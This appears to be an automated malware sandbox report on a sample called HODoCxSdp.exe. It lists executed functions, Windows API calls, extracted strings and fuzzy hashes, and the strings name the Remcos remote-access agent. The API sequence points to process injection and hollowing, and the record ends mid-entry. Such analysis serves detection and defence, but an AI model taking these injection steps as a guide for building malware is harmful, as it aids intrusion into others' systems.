VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D2561E

Memory Dump Source

Source File: 0000000C.00000002.1794298798.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d20000_HODoCxSdp.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c821a92381a9a1bdb48f48ba79573c15ff9809ae0cde24bf002d965e0f1b647d
Instruction ID: c93024a9f64106d40193d49eb960affc20bc0c65d0c81f1c5c1f0c86bbb04ea8
Opcode Fuzzy Hash: c821a92381a9a1bdb48f48ba79573c15ff9809ae0cde24bf002d965e0f1b647d
Instruction Fuzzy Hash: 341164B18002099FCB10DFAAC845AEFFFF5EF88324F208419E519A7250CB35A940CFA0

Function 06D24FE8 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06D25052

Memory Dump Source

Source File: 0000000C.00000002.1794298798.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d20000_HODoCxSdp.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: db9c066251c1d44deeb3645ef88541507e360d7101a3edb4259f72f2675024d7
Instruction ID: d64565916702478f2f5b12b936174b3b5dd5487d2cb40f48daa94d3b34636533
Opcode Fuzzy Hash: db9c066251c1d44deeb3645ef88541507e360d7101a3edb4259f72f2675024d7
Instruction Fuzzy Hash: 4F1146B19002498ECB20DFAAD845AEFFFF5AF98324F24842AD459A7240CA355945CBA4

Function 06D24FF0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06D25052

Memory Dump Source

Source File: 0000000C.00000002.1794298798.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d20000_HODoCxSdp.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1f6bed221571da0ce6c87213ce0fbeb10eee04f1fc0cf85c163aa440bea0779f
Instruction ID: d2fe59c72f163ae5d74e8e17b7bb445b650d5c64dbdc449b81f7fe34c8599989
Opcode Fuzzy Hash: 1f6bed221571da0ce6c87213ce0fbeb10eee04f1fc0cf85c163aa440bea0779f
Instruction Fuzzy Hash: 0C1125B1D003598BCB20DFAAC845BDEFBF5EB88324F248419D519A7240CA75A944CBA4

Function 06D271C0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06D2903D

Memory Dump Source

Source File: 0000000C.00000002.1794298798.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d20000_HODoCxSdp.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 3a18e46032fdcef45b53623eda535fe972c6a7f014d8595b32153d3b7fb7d219
Instruction ID: daf106fb2e12d274fdc0104e029ca2a78a92f96751b21c659a821027fc2183b5
Opcode Fuzzy Hash: 3a18e46032fdcef45b53623eda535fe972c6a7f014d8595b32153d3b7fb7d219
Instruction Fuzzy Hash: 4311F5B58003599FDB20DF9AD949BDEFBF8EB58324F108419E918A7240C375A944CFA5

Function 06D28FD9 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06D2903D

Memory Dump Source

Source File: 0000000C.00000002.1794298798.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6d20000_HODoCxSdp.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 561114e56db609e5b30cf0dc2308fcd62952cee6f11f4efa563544413707f53d
Instruction ID: 44e66cf5b6f90cf783cbd2fff6c1fa8e7f5cac24a3a1d7a9352c8b7601542c8e
Opcode Fuzzy Hash: 561114e56db609e5b30cf0dc2308fcd62952cee6f11f4efa563544413707f53d
Instruction Fuzzy Hash: 2811F2B58003598FDB10DF9AC545BDEBBF4EB48324F10841AD519A7250C375AA84CFA5

Function 00AAD53C Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1778076720.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_aad000_HODoCxSdp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a5ed8b294f6b3458dfe81f48bd55d06b353b2adb46e1fa9fa801e4a86692eb3
Instruction ID: 569829133d5cbcabd2a10a47455e805cb04dcf3281775784a400634313e3df6b
Opcode Fuzzy Hash: 2a5ed8b294f6b3458dfe81f48bd55d06b353b2adb46e1fa9fa801e4a86692eb3
Instruction Fuzzy Hash: 552125B1904201EFCB05DF14D9C0B26BF65FB99328F24C56DE84A4B686C336D816DBA1

Function 00ABD0EC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1778174834.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_abd000_HODoCxSdp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa42aae01f9b61ed9fea41db213cfee725f7d2f212788318604dfdad53c814e3
Instruction ID: 889c2d7b763e6ac9faeb920c02b8edbf3283e15b6b2ac62fe0c93663adbadcc8
Opcode Fuzzy Hash: fa42aae01f9b61ed9fea41db213cfee725f7d2f212788318604dfdad53c814e3
Instruction Fuzzy Hash: 7F21F5B5644200AFDB04DF18E9C4B56BBA9FB94314F24CA6DD80A4B393D336D846CAA1

Function 00ABD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1778174834.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_abd000_HODoCxSdp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6057407c249dfe379b936cebc1402e0b3777cd0f344d50fa81dd8060518823f
Instruction ID: f429cb63b3ee31dcdf732614ff8b856fe2855535c380b8d3342d8a18a6488a1a
Opcode Fuzzy Hash: b6057407c249dfe379b936cebc1402e0b3777cd0f344d50fa81dd8060518823f
Instruction Fuzzy Hash: 3B21F5B5604280EFDB05DF14D9C4BA5BBA9FB94314F24CA6DD80A4B292D336D806CB61

Function 00AAD537 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1778076720.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_aad000_HODoCxSdp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: e7c4330bfaa80d682a4ba3e93bcd1dc26f569ff3b5a3172801f297e45ddcfdaa
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: 3411E676904240CFCB06DF10D5C4B16BF72FB98324F24C5ADD84A4B696C336D85ACBA1

Function 00ABD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1778174834.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_abd000_HODoCxSdp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: a5b79a3b7a1197b81f786054e9fc87b5e78755f9fd34a6a6fb62fa7161d97a16
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: 2611BB75904280DFCB02CF10C5C4B55BFB2FB84324F24C6ADD8494B296C33AD80ACB61

Function 00ABD0E7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1778174834.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_abd000_HODoCxSdp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: 74d6eb0c571da9025d7b976fd13a4ff0a2eb2ee0852bc5738ebdb9ee4592e5be
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: 81118B75544280DFDB05CF14E9C4B55BFB2FB84324F28C6A9D8494B696C33AD84ACBA1

Function 00AAD759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1778076720.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_aad000_HODoCxSdp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f743eb440141fd0754d15333419363302854ec6c65f93c7f1bae375910894a1b
Instruction ID: 894eab49ccb939bbda8749db2522da2ee2234d5408c6bdd7af223f3366f5078c
Opcode Fuzzy Hash: f743eb440141fd0754d15333419363302854ec6c65f93c7f1bae375910894a1b
Instruction Fuzzy Hash: 8E01D6710093449EE7249B29DCC4B66FFE8DF62325F18C85AED4E4B6C6C7799840C6B1

Function 00AAD758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1778076720.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_aad000_HODoCxSdp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f98ff0fb778af96f386a08a26399b2dab1c92307bf0a8bd6a42740d588a931c0
Instruction ID: eefca0fb4a66aa1e94dc20bf756e0336419ef1b82d165e790e7fa2bea23c895c
Opcode Fuzzy Hash: f98ff0fb778af96f386a08a26399b2dab1c92307bf0a8bd6a42740d588a931c0
Instruction Fuzzy Hash: 92F0C2314053409EE7248B06CC88B62FFA8EF51734F18C45AED494B2C6C379A840CAB0

Analysis Process: HODoCxSdp.exePID: 7812, Parent PID: 7476COMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.6%
Total number of Nodes:	643
Total number of Limit Nodes:	17

Executed Functions

Function 0041A8DA Relevance: 105.1, APIs: 36, Strings: 24, Instructions: 130
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
GetProcAddress.KERNEL32(00000000), ref: 0041A912
LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
GetProcAddress.KERNEL32(00000000), ref: 0041A927
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
GetProcAddress.KERNEL32(00000000), ref: 0041A940
GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
GetProcAddress.KERNEL32(00000000), ref: 0041A954
GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
GetProcAddress.KERNEL32(00000000), ref: 0041A96C
LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
GetProcAddress.KERNEL32(00000000), ref: 0041A980
LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
GetProcAddress.KERNEL32(00000000), ref: 0041A98F
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
GetProcAddress.KERNEL32(00000000), ref: 0041AA22
LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
GetProcAddress.KERNEL32(00000000), ref: 0041AA33
LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
GetProcAddress.KERNEL32(00000000), ref: 0041AA43

Strings

kernel32, xrefs: 0041A996, 0041A9A0, 0041A9AB, 0041A9CF
GetComputerNameExW, xrefs: 0041A9A6
Kernel32.dll, xrefs: 0041A90A, 0041A938
SetProcessDEPPolicy, xrefs: 0041A9CA
SetProcessDpiAwareness, xrefs: 0041A947
NtUnmapViewOfSection, xrefs: 0041A973
GetSystemTimes, xrefs: 0041AA0F
user32, xrefs: 0041A964, 0041A9DF, 0041A9E9, 0041A9F4, 0041AA04
Shell32, xrefs: 0041A9BB
GetMonitorInfoW, xrefs: 0041A9FF
EnumDisplayMonitors, xrefs: 0041A9EF
SetProcessDpiAware, xrefs: 0041A95F
GlobalMemoryStatusEx, xrefs: 0041A982
GetModuleFileNameExW, xrefs: 0041A919, 0041A91E, 0041A937
GetConsoleWindow, xrefs: 0041AA35
Psapi.dll, xrefs: 0041A8EA, 0041A91F
IsWow64Process, xrefs: 0041A991
IsUserAnAdmin, xrefs: 0041A9B6
EnumDisplayDevicesW, xrefs: 0041A9DA
GetModuleFileNameExA, xrefs: 0041A8E4, 0041A8E9, 0041A909
Shlwapi.dll, xrefs: 0041AA26
kernel32.dll, xrefs: 0041A987, 0041AA14, 0041AA1E, 0041AA3A
shcore, xrefs: 0041A94C
ntdll.dll, xrefs: 0041A978

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
API String ID: 551388010-2474455403
Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

Function 004407B5 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
ExitProcess.KERNEL32 ref: 004407EF

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89

Function 0040D3F0 Relevance: 69.0, APIs: 16, Strings: 23, Instructions: 774
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603

Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992

Strings

Remcos Agent initialized, xrefs: 0040DA83
H"G, xrefs: 0040D9B8
Administrator, xrefs: 0040DD08
0"G, xrefs: 0040D656
license_code.txt, xrefs: 0040D465
`"G, xrefs: 0040DCA3
!G, xrefs: 0040D8AC
licence, xrefs: 0040DA22
origmsc, xrefs: 0040D6F7
(#G, xrefs: 0040D596
Inj, xrefs: 0040D626, 0040D62C, 0040D641
Access Level: , xrefs: 0040DD3D
!G, xrefs: 0040D9F6
!G, xrefs: 0040D919
0"G, xrefs: 0040D52A
!G, xrefs: 0040D8F2
Exe, xrefs: 0040D534
!G, xrefs: 0040D8B6
User, xrefs: 0040DD2C
H"G, xrefs: 0040D904
Software\, xrefs: 0040D4E6
exepath, xrefs: 0040D931, 0040D9DB
0"G, xrefs: 0040D586

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
API String ID: 1529173511-1365410817
Opcode ID: 247c226a062b47ce7864b045c16d0391970f561cd3808a145f5236f79d582a9c
Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
Opcode Fuzzy Hash: 247c226a062b47ce7864b045c16d0391970f561cd3808a145f5236f79d582a9c
Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

Function 00404E06 Relevance: 18.1, APIs: 12, Instructions: 65
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
FindCloseChangeNotification.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
closesocket.WS2_32(?), ref: 00404E3A
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E71
SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E82
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E89
SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9A
CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9F
CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EA4
SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB1
CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB6

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
String ID:
API String ID: 2403171778-0
Opcode ID: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
Opcode Fuzzy Hash: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58

Function 004457A9 Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
_free.LIBCMT ref: 004457E3
_free.LIBCMT ref: 0044580A
SetLastError.KERNEL32(00000000), ref: 00445817
SetLastError.KERNEL32(00000000), ref: 00445820

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
Opcode Fuzzy Hash: d4e383c12478905910161cad80a238fc5d6e44a6254b0909f9091c4c9b8107c1
Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D

Function 00445A95 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8

Function 004459F9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00445A59
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00445A66

Strings

e]j[/, xrefs: 00445A0D, 00445A49, 00445A70, 00445A78

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID: e]j[/
API String ID: 2279764990-424226671
Opcode ID: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
